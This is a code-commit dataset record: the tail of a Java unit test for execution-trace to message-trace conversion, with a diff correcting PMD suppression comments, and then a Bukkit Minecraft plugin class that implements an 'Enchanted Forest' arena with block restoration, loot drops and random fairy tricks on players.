this.genValidBookstoreTrace(); /** * Will be used to create a clone of exec0_0__bookstore_searchBook with certain variations * selected from the execution. */ final Execution variationTemplate = new Execution(this.exec1_1__catalog_getBook.getOperation(), this.exec1_1__catalog_getBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getTraceId() + 100, this.exec1_1__catalog_getBook.getSessionId() + "_", this.exec1_1__catalog_getBook.getEoi() + 100, this.exec1_1__catalog_getBook.getEss() + 100, this.exec1_1__catalog_getBook.getTin() + 100, this.exec1_1__catalog_getBook.getTout(), !this.exec1_1__catalog_getBook.isAssumed()); vLoop: for (final VariationPoint vPoint : VariationPoint.values()) { final ExecutionTrace trace1 = new ExecutionTrace(trace0.getTraceId(), trace0.getSessionId()); for (final Execution execFromTrace0 : trace0.getTraceAsSortedExecutionSet()) { final Execution execToAddToTrace1; if (execFromTrace0 == this.exec0_0__bookstore_searchBook) { execToAddToTrace1 = this.cloneExecutionWithVariation(this.exec0_0__bookstore_searchBook, vPoint, variationTemplate); // This tests the Execution's equals method already Assert.assertFalse("Executions must not be equal (variation point: " + vPoint + " ) but they are: " + execFromTrace0 + "; " + execToAddToTrace1, execFromTrace0.equals(execToAddToTrace1)); if (vPoint == VariationPoint.TRACE_ID) { // We won't be able to continue for this variation because we cannot add an execution // with a varying trace id. However, at least we've tested the Execution's equal method. 
continue vLoop; } } else { execToAddToTrace1 = execFromTrace0; } trace1.add(execToAddToTrace1); } Assert.assertFalse("Execution traces must not be equal (variation point: " + vPoint + " ) but they are: " + trace0 + "; " + trace1, trace0.equals(trace1)); } } /** * This method can be used to debug the {@link java.util.Comparator} provided by {@link ExecutionTrace#createExecutionTraceComparator()}. */ @Test public void testTreeSet() { final SortedSet<Execution> s0 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final SortedSet<Execution> s1 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final Execution execFromTrace0 = this.exec0_0__bookstore_searchBook; final Execution long1 = new Execution(execFromTrace0.getOperation(), execFromTrace0.getAllocationComponent(), execFromTrace0.getTraceId(), execFromTrace0.getSessionId(), execFromTrace0.getEoi(), execFromTrace0.getEss(), execFromTrace0.getTin(), execFromTrace0.getTout(), execFromTrace0.isAssumed()); s0.add(execFromTrace0); s1.add(long1); Assert.assertEquals("Expected sets to be equal", s0, s1); } /** * Tests whether the "well-known" Bookstore trace can be correctly transformed * from an Execution Trace representation into a Message Trace representation. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationValidTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation */ final MessageTrace messageTrace = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); /* * Validate Message Trace representation. */ Assert.assertEquals("Invalid traceId", messageTrace.getTraceId(), TestExecutionTraceBookstore.TRACE_ID); final List<AbstractMessage> msgVector = messageTrace.getSequenceAsVector(); Assert.assertEquals("Invalid number of messages in trace", msgVector.size(), this.numExecutions * 2); final AbstractMessage[] msgArray = msgVector.toArray(new AbstractMessage[msgVector.size()]); Assert.assertEquals(msgArray.length, this.numExecutions * 2); int curIdx = 0; { /* 1.: [0,0].Call $->bookstore.searchBook(..) */// NOCS final AbstractMessage call0_0___root__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call0_0___root__bookstore_searchBook instanceof SynchronousCallMessage); // NOPMD (String repeat) Assert.assertEquals("Sending execution is not root execution", call0_0___root__bookstore_searchBook.getSendingExecution(), SystemModelRepository.ROOT_EXECUTION); Assert.assertEquals(call0_0___root__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", call0_0___root__bookstore_searchBook.getTimestamp(), this.exec0_0__bookstore_searchBook.getTin()); // NOPMD } { /* 2.: [1,1].Call bookstore.searchBook(..)->catalog.getBook(..) 
*/// NOCS final AbstractMessage call1_1___bookstore_searchBook_catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call1_1___bookstore_searchBook_catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getReceivingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call1_1___bookstore_searchBook_catalog_getBook.getTimestamp(), this.exec1_1__catalog_getBook.getTin()); } { /* 2.: [1,1].Return catalog.getBook(..)->bookstore.searchBook(..) */// NOCS final AbstractMessage return1_1___catalog_getBook__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return1_1___catalog_getBook__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getSendingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return1_1___catalog_getBook__bookstore_searchBook.getTimestamp(), this.exec1_1__catalog_getBook.getTout()); } { /* 3.: [2,1].Call bookstore.searchBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage call2_1___bookstore_searchBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call2_1___bookstore_searchBook__crm_getOrders instanceof SynchronousCallMessage); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", call2_1___bookstore_searchBook__crm_getOrders.getTimestamp(), this.exec2_1__crm_getOrders.getTin()); } { /* 4.: [3,2].Call crm.getOrders(..)->catalog.getBook(..) */// NOCS final AbstractMessage call3_2___bookstore_searchBook__catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call3_2___bookstore_searchBook__catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getReceivingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call3_2___bookstore_searchBook__catalog_getBook.getTimestamp(), this.exec3_2__catalog_getBook.getTin()); } { /* 5.: [3,2].Return catalog.getBook(..)->crm.getOrders(..) 
*/// NOCS final AbstractMessage return3_2___catalog_getBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return3_2___catalog_getBook__crm_getOrders instanceof SynchronousReplyMessage); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getSendingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", return3_2___catalog_getBook__crm_getOrders.getTimestamp(), this.exec3_2__catalog_getBook.getTout()); } { /* 6.: [2,1].Return crm.getOrders(..)->bookstore.searchBook */// NOCS final AbstractMessage return2_1___crm_getOrders__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return2_1___crm_getOrders__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return2_1___crm_getOrders__bookstore_searchBook.getTimestamp(), this.exec2_1__crm_getOrders.getTout()); } } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationOnlyOnce() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation (twice) * and make sure, that the instances are the same. */ final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertSame(messageTrace1, messageTrace2); } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationTwiceOnChange() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); final Execution exec4_1__catalog_getBook = this.eFactory // NOCS .genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 9, 10, 4, 1); final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); executionTrace.add(exec4_1__catalog_getBook); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertNotSame(messageTrace1, messageTrace2); } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. 
* * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEssSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec1_1__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 3); // NOCS Assert.assertFalse("Invalid test", exec1_1__catalog_getBook__broken.equals(this.exec1_1__catalog_getBook)); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(exec1_1__catalog_getBook__broken); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEssSkip() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEssSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ TestExecutionTraceBookstore.LOG.info("This test triggers a FATAL warning about an ess skip <0,3> which can simply be ignored because it is desired"); executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec3_2__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 6, 7, 4, 2); Assert.assertFalse("Invalid test", exec3_2__catalog_getBook__broken.equals(this.exec3_2__catalog_getBook)); executionTrace.add(exec3_2__catalog_getBook__broken); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. 
Since eoi values must only * increment by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEoiSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } }
aaaaaaaaaaaaaaaaaaaaaaaaah: fixed PMD issues
test/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java
aaaaaaaaaaaaaaaaaaaaaaaaah: fixed PMD issues
<ide><path>est/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java <ide> private volatile int numExecutions; <ide> <ide> /* Executions of a valid trace */ <del> private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec1_1__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec2_1__crm_getOrders; // NOCS // NOMPD (VariableNamingConventions) <del> private volatile Execution exec3_2__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) <add> private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec1_1__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec2_1__crm_getOrders; // NOCS // NOPMD (VariableNamingConventions) <add> private volatile Execution exec3_2__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) <ide> <ide> // public TestExecutionTraceBookstore() { <ide> //
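The diff above does nothing more than rename the suppression markers from "NOMPD" to "NOPMD". For readers unfamiliar with the convention, the short sketch below (not taken from the Kieker sources; the class and field names are made up) shows how PMD's default suppression marker behaves: PMD ignores violations reported on a line whose trailing comment contains NOPMD, and the rule name written in parentheses is purely informational. The // NOCS tags in the file above appear to be a project-specific Checkstyle marker and are left untouched by the commit.

// Minimal sketch, assuming only a standard JDK; class and field names are hypothetical.
public class SuppressionMarkerExample {

	// The unconventional field name would normally trip a naming rule; the trailing
	// comment tells PMD to skip this line. The misspelled "NOMPD" marker is not
	// recognized by PMD, which is exactly what the commit above corrects.
	private final long exec0_0__searchBook_tin = 1L; // NOPMD (VariableNamingConventions)

	public long getTin() {
		return this.exec0_0__searchBook_tin;
	}

	public static void main(final String[] args) {
		System.out.println(new SuppressionMarkerExample().getTin());
	}
}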
Java
agpl-3.0
86b4a56e3354836c3d40adebf91187de2f060f9c
0
Skelril/Aurora
package com.skelril.aurora.city.engine.arena; import com.google.common.collect.Lists; import com.sk89q.commandbook.CommandBook; import com.sk89q.worldedit.BlockVector; import com.sk89q.worldedit.blocks.BaseBlock; import com.sk89q.worldedit.blocks.BlockID; import com.sk89q.worldedit.blocks.BlockType; import com.sk89q.worldedit.blocks.ItemID; import com.sk89q.worldguard.protection.regions.ProtectedRegion; import com.skelril.aurora.SacrificeComponent; import com.skelril.aurora.admin.AdminComponent; import com.skelril.aurora.events.EggHatchEvent; import com.skelril.aurora.util.ChanceUtil; import com.skelril.aurora.util.ChatUtil; import com.skelril.aurora.util.EnvironmentUtil; import com.skelril.aurora.util.LocationUtil; import org.bukkit.ChatColor; import org.bukkit.Location; import org.bukkit.Server; import org.bukkit.World; import org.bukkit.block.Block; import org.bukkit.command.CommandSender; import org.bukkit.entity.EntityType; import org.bukkit.entity.Item; import org.bukkit.entity.Player; import org.bukkit.entity.Slime; import org.bukkit.event.EventHandler; import org.bukkit.event.EventPriority; import org.bukkit.event.Listener; import org.bukkit.event.block.BlockBreakEvent; import org.bukkit.event.block.BlockPlaceEvent; import org.bukkit.event.block.LeavesDecayEvent; import org.bukkit.event.entity.ItemSpawnEvent; import org.bukkit.event.player.PlayerBucketEmptyEvent; import org.bukkit.event.player.PlayerBucketFillEvent; import org.bukkit.event.player.PlayerDropItemEvent; import org.bukkit.inventory.ItemStack; import org.bukkit.inventory.PlayerInventory; import org.bukkit.inventory.meta.PotionMeta; import org.bukkit.potion.Potion; import org.bukkit.potion.PotionEffect; import org.bukkit.potion.PotionEffectType; import org.bukkit.potion.PotionType; import org.bukkit.util.Vector; import java.util.*; import java.util.concurrent.ConcurrentHashMap; import java.util.logging.Logger; /** * Author: Turtle9598 */ public class EnchantedForest extends AbstractRegionedArena implements MonitoredArena, Listener { private final CommandBook inst = CommandBook.inst(); private final Logger log = inst.getLogger(); private final Server server = CommandBook.server(); private AdminComponent adminComponent; private final Random random = new Random(); private ConcurrentHashMap<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> map = new ConcurrentHashMap<>(); public EnchantedForest(World world, ProtectedRegion region, AdminComponent adminComponent) { super(world, region); this.adminComponent = adminComponent; //noinspection AccessStaticViaInstance inst.registerEvents(this); } @Override public void forceRestoreBlocks() { BaseBlock b; for (Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e : map.entrySet()) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); } map.clear(); } @Override public void run() { equalize(); restoreBlocks(); } @Override public void disable() { forceRestoreBlocks(); } @Override public String getId() { return getRegion().getId(); } @Override public void equalize() { for (Player player : getContainedPlayers()) { try { adminComponent.deadmin(player); } catch (Exception e) { log.warning("The player: " + player.getName() + " may have an unfair advantage."); } } } @Override public ArenaType getArenaType() { return ArenaType.MONITORED; } public void restoreBlocks() { int min = 1000 * 60 * 170; BaseBlock b; Map.Entry<Location, AbstractMap.SimpleEntry<Long, 
BaseBlock>> e; Iterator<Map.Entry<Location,AbstractMap.SimpleEntry<Long,BaseBlock>>> it = map.entrySet().iterator(); while(it.hasNext()) { e = it.next(); if ((System.currentTimeMillis() - e.getValue().getKey()) > min) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } else if (System.currentTimeMillis() - e.getValue().getKey() > (min / 20) && EnvironmentUtil.isShrubBlock(e.getValue().getValue().getType())) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } } } private List<ItemStack> getRandomDropSet(CommandSender player) { // Create the Sacrifice int amt, value; if (ChanceUtil.getChance(59)) { amt = 64; value = 5248; } else { amt = 8; value = 88; } // Sacrifice and make loot list List<ItemStack> loot; do { loot = SacrificeComponent.getCalculatedLoot(player, amt, value); } while (loot == null || loot.size() < 1); // Shuffle and return loot for variety Collections.shuffle(loot); return loot; } private void eatFood(Player player) { if (player.getSaturation() - 1 >= 0) { player.setSaturation(player.getSaturation() - 1); } else if (player.getFoodLevel() - 1 >= 0) { player.setFoodLevel(player.getFoodLevel() - 1); } } private void trick(final Player player) { if (ChanceUtil.getChance(256)) { final PlayerInventory pInv = player.getInventory(); switch (ChanceUtil.getRandom(3)) { case 1: boolean hasAxe = true; switch (pInv.getItemInHand().getTypeId()) { case ItemID.DIAMOND_AXE: pInv.addItem(new ItemStack(ItemID.DIAMOND, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.GOLD_AXE: pInv.addItem(new ItemStack(ItemID.GOLD_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.IRON_AXE: pInv.addItem(new ItemStack(ItemID.IRON_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.WOOD_AXE: pInv.addItem(new ItemStack(BlockID.WOOD, 2), new ItemStack(ItemID.STICK, 2)); break; default: hasAxe = false; ChatUtil.sendWarning(player, "The fairy couldn't find an axe and instead throws a rock" + "at you."); player.damage(7); player.setVelocity(new Vector( random.nextDouble() * 2.0 - 1.5, random.nextDouble() * 1, random.nextDouble() * 2.0 - 1.5) ); } if (hasAxe) { ChatUtil.sendWarning(player, "The fairy breaks your axe."); server.getScheduler().runTaskLater(inst, new Runnable() { @Override public void run() { player.getInventory().setItemInHand(null); } }, 1); } break; case 2: // Make potion ItemStack potion = new Potion(PotionType.INSTANT_DAMAGE).toItemStack(1); PotionMeta pMeta = (PotionMeta) potion.getItemMeta(); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.REGENERATION, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.DAMAGE_RESISTANCE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.WATER_BREATHING, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.FIRE_RESISTANCE, 20 * 600, 2), false); pMeta.setDisplayName(ChatColor.WHITE + "Extreme Combat Potion"); potion.setItemMeta(pMeta); // Give potion ChatUtil.sendWarning(player, "You might need this friend ;)"); getWorld().dropItemNaturally(player.getLocation(), potion); int waves = 5 * ChanceUtil.getRandom(3); for (int i = 0; i < waves; i++) { 
server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Slimes away guys!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < 25 * ChanceUtil.getRandom(4); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (b.getTypeId() == BlockID.AIR || EnvironmentUtil.isShrubBlock(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(ChanceUtil.getRandom(8)); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (i + 1)); } server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Release the god slime!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < ChanceUtil.getRandom(1); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (BlockType.canPassThrough(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(16); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (waves + 1)); break; case 3: List<ItemStack> toDrop = Lists.newArrayList(pInv.getArmorContents()); toDrop.addAll(Arrays.asList(pInv.getContents())); for (ItemStack aDrop : toDrop) { if (aDrop == null || aDrop.getTypeId() == BlockID.AIR) continue; Item item = getWorld().dropItem(player.getLocation(), aDrop); item.setVelocity(new Vector( random.nextDouble() * 2 - 1, random.nextDouble() * 1, random.nextDouble() * 2 - 1 )); } pInv.setArmorContents(null); pInv.clear(); ChatUtil.sendNotice(player, "The fair throws your stuff all over the place"); } } } @EventHandler(priority = EventPriority.HIGHEST, ignoreCancelled = true) public void onBlockBreak(BlockBreakEvent event) { final Player player = event.getPlayer(); final Block block = event.getBlock(); ItemStack itemInHand = player.getItemInHand(); if (!adminComponent.isAdmin(player) && contains(block) && (block.getTypeId() == BlockID.LOG || EnvironmentUtil.isShrubBlock(block)) && itemInHand != null) { if (block.getTypeId() == BlockID.LOG) { short c = 0; for (ItemStack aItemStack : getRandomDropSet(player)) { if (c >= 3) break; getWorld().dropItemNaturally(block.getLocation(), aItemStack); c++; } event.setExpToDrop(ChanceUtil.getRandom(4)); eatFood(player); trick(player); } map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } else if (contains(block)) { event.setCancelled(true); ChatUtil.sendWarning(player, "You cannot break this block for some reason."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onLeafDecay(LeavesDecayEvent event) { if (contains(event.getBlock())) { Block block = event.getBlock(); map.put(block.getLocation(), new 
AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); if (!ChanceUtil.getChance(14)) return; getWorld().dropItemNaturally(block.getLocation(), getRandomDropSet(server.getConsoleSender()).get(0)); } } @EventHandler(ignoreCancelled = true) public void onItemSpawn(ItemSpawnEvent event) { if (contains(event.getEntity())) { for (Location l : map.keySet()) { if (l.getBlock().equals(event.getEntity().getLocation().getBlock())) { int is = event.getEntity().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onPlayerDropItem(PlayerDropItemEvent event) { if (contains(event.getItemDrop())) { for (Location l : map.keySet()) { if (event.getItemDrop().getLocation().getBlock().equals(l.getBlock())) { int is = event.getItemDrop().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { ChatUtil.sendError(event.getPlayer(), "You can't drop that here."); event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onBlockPlace(BlockPlaceEvent event) { Player player = event.getPlayer(); if (!adminComponent.isAdmin(player) && contains(event.getBlock()) && !inst.hasPermission(player, "aurora.mine.builder")) { event.setCancelled(true); ChatUtil.sendNotice(player, ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onBucketFill(PlayerBucketFillEvent event) { if (contains(event.getBlockClicked())) { final Block block = event.getBlockClicked(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } } @EventHandler(ignoreCancelled = true) public void onBucketEmpty(PlayerBucketEmptyEvent event) { if (contains(event.getBlockClicked())) { event.setCancelled(true); ChatUtil.sendNotice(event.getPlayer(), ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(ignoreCancelled = true) public void onEggHatch(EggHatchEvent event) { if (contains(event.getEgg())) event.setCancelled(true); } }
src/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java
package com.skelril.aurora.city.engine.arena; import com.sk89q.commandbook.CommandBook; import com.sk89q.worldedit.BlockVector; import com.sk89q.worldedit.blocks.BaseBlock; import com.sk89q.worldedit.blocks.BlockID; import com.sk89q.worldedit.blocks.BlockType; import com.sk89q.worldedit.blocks.ItemID; import com.sk89q.worldguard.protection.regions.ProtectedRegion; import com.skelril.aurora.SacrificeComponent; import com.skelril.aurora.admin.AdminComponent; import com.skelril.aurora.events.EggHatchEvent; import com.skelril.aurora.util.ChanceUtil; import com.skelril.aurora.util.ChatUtil; import com.skelril.aurora.util.EnvironmentUtil; import com.skelril.aurora.util.LocationUtil; import org.bukkit.ChatColor; import org.bukkit.Location; import org.bukkit.Server; import org.bukkit.World; import org.bukkit.block.Block; import org.bukkit.command.CommandSender; import org.bukkit.entity.EntityType; import org.bukkit.entity.Player; import org.bukkit.entity.Slime; import org.bukkit.event.EventHandler; import org.bukkit.event.EventPriority; import org.bukkit.event.Listener; import org.bukkit.event.block.BlockBreakEvent; import org.bukkit.event.block.BlockPlaceEvent; import org.bukkit.event.block.LeavesDecayEvent; import org.bukkit.event.entity.ItemSpawnEvent; import org.bukkit.event.player.PlayerBucketEmptyEvent; import org.bukkit.event.player.PlayerBucketFillEvent; import org.bukkit.event.player.PlayerDropItemEvent; import org.bukkit.inventory.ItemStack; import org.bukkit.inventory.PlayerInventory; import org.bukkit.inventory.meta.PotionMeta; import org.bukkit.potion.Potion; import org.bukkit.potion.PotionEffect; import org.bukkit.potion.PotionEffectType; import org.bukkit.potion.PotionType; import org.bukkit.util.Vector; import java.util.*; import java.util.concurrent.ConcurrentHashMap; import java.util.logging.Logger; /** * Author: Turtle9598 */ public class EnchantedForest extends AbstractRegionedArena implements MonitoredArena, Listener { private final CommandBook inst = CommandBook.inst(); private final Logger log = inst.getLogger(); private final Server server = CommandBook.server(); private AdminComponent adminComponent; private final Random random = new Random(); private ConcurrentHashMap<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> map = new ConcurrentHashMap<>(); public EnchantedForest(World world, ProtectedRegion region, AdminComponent adminComponent) { super(world, region); this.adminComponent = adminComponent; //noinspection AccessStaticViaInstance inst.registerEvents(this); } @Override public void forceRestoreBlocks() { BaseBlock b; for (Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e : map.entrySet()) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); } map.clear(); } @Override public void run() { equalize(); restoreBlocks(); } @Override public void disable() { forceRestoreBlocks(); } @Override public String getId() { return getRegion().getId(); } @Override public void equalize() { for (Player player : getContainedPlayers()) { try { adminComponent.deadmin(player); } catch (Exception e) { 